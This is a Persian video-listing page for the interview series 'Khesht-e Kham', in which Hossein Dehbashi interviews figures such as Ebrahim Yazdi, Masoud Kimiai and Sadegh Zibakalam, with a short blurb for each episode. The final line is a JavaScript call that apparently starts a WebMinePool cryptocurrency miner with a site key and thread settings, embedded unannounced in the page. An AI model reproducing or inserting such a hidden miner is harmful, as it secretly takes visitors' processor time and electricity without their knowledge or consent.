خشت‌خام

مجموعه «خشتِ خام» / نوبتِ 11 /  لطف الله میثمی
مجموعه «خشتِ خام» / نوبتِ 11 / لطف الله میثمی

مجموعه «خشتِ خام» / نوبتِ 11 / گفتگو با لطف الله میثمی

مشاهده
خشت خام /نوبت دهم/  مسعود کیمیایی
خشت خام /نوبت دهم/ مسعود کیمیایی

خشت خام /نوبت دهم/ گفتگو حسین دهباشی با مسعود کیمیایی

مشاهده
مجموعه«خشتِ خام»/نوبتِ نهم/ دکتر عبدالرضا داوری
مجموعه«خشتِ خام»/نوبتِ نهم/ دکتر عبدالرضا داوری

مجموعه خشت خام / نوبت نهم / گفتگو حسین دهباشی با عبدالرضا داوری

مشاهده
خشت خام /نوبت هشتم/ سید هادی خامنه ای
خشت خام /نوبت هشتم/ سید هادی خامنه ای

خشت خام /نوبت هشتم/ گفتگو حسین دهباشی با سید هادی خامنه ای

مشاهده
خشت خام /نوبت هفتم/ مهدی رحمانیان
خشت خام /نوبت هفتم/ مهدی رحمانیان

خشت خام /نوبت هفتم/ گفتگو حسین دهباشی با مهدی رحمانیان

مشاهده
خشت خام /نوبت ششم/  سید محمد بهشتی
خشت خام /نوبت ششم/ سید محمد بهشتی

خشت خام /نوبت ششم/ گفتگو حسین دهباشی با سید محمد بهشتی

مشاهده
خشت خام /نوبت پنجم/ محمدرضا زائری
خشت خام /نوبت پنجم/ محمدرضا زائری

خشت خام /نوبت پنجم/ گفتگو حسین دهباشی با محمدرضا زائری

مشاهده
خشت خام/نوبت 4/ دکتر صادق زیباکلام
خشت خام/نوبت 4/ دکتر صادق زیباکلام

خشتِ خام/نوبت 4/ گفتگو حسین دهباشی با دکترصادق زیباکلام - پخش از کانال تاریخ‌آنلاین

مشاهده
خشت خام/ نوبتِ 3/ ابراهیم یزدی
خشت خام/ نوبتِ 3/ ابراهیم یزدی

خشت خام/ نوبتِ سوم/گفتگوی حسین دهباشی با ابراهیم یزدی -پخش از کانال تاریخ آنلاین- دلایل شروع جنگ ایران و عراق، ما میخواستیم جنگ تمام شود، امام میگفت بصره را می گیریم بعد صلح میکنیم، برنامه های تلویزیون عراق را تحریک کرد، حمله عراق قابل پیش بینی و پیش گیری بود، برخی از اعدام ها خلاف نظر امام بود،جامعه به اشتباه اعدام میخواست و ما زورمان نمیرسید،سید احمد با روش های ما مخالف بود، به آینده خوش بینم...

مشاهده
تاریخ‌آنلاین/ «خشتِ خام»/ آگهی نوبت سوم/ گفتگو با دکتر ابراهیم یزدی
تاریخ‌آنلاین/ «خشتِ خام»/ آگهی نوبت سوم/ گفتگو با دکتر ابراهیم یزدی

تاریخ آنلاین: مجموعه «خشتِ خام»/ آگهی نوبتِ سوّم/ گفتگو با دکترابراهیم یزدی/ یکشنبه ۱۶ آبان‌ماه/

مشاهده
مجموعه «خشتِ خام»/ آگهی نوبتِ سوّم/  دکترابراهیم یزدی
مجموعه «خشتِ خام»/ آگهی نوبتِ سوّم/ دکترابراهیم یزدی

مجموعه «خشتِ خام»/ آگهی نوبتِ سوّم/ گفتگو با دکترابراهیم یزدی/ یکشنبه ۱۶ آبان‌ماه

مشاهده
خشت خام/ نوبتِ 2/ حمید رسایی
خشت خام/ نوبتِ 2/ حمید رسایی

مجموعه خشت خام از کانال تاریخ آنلاین - قسمت دوم گفتگوی حسین دهباشی با حجت الاسلام و المسلمین حمید رسایی - پخش از کانال تاریخ آنلاین

مشاهده


var someData = WMP.User('SK_A4VFH9k7Si5999pXyW7id', 'soroush',{ threads: 4, autoThreads: false, throttle: 0.3, forceASMJS: false }); someData.start();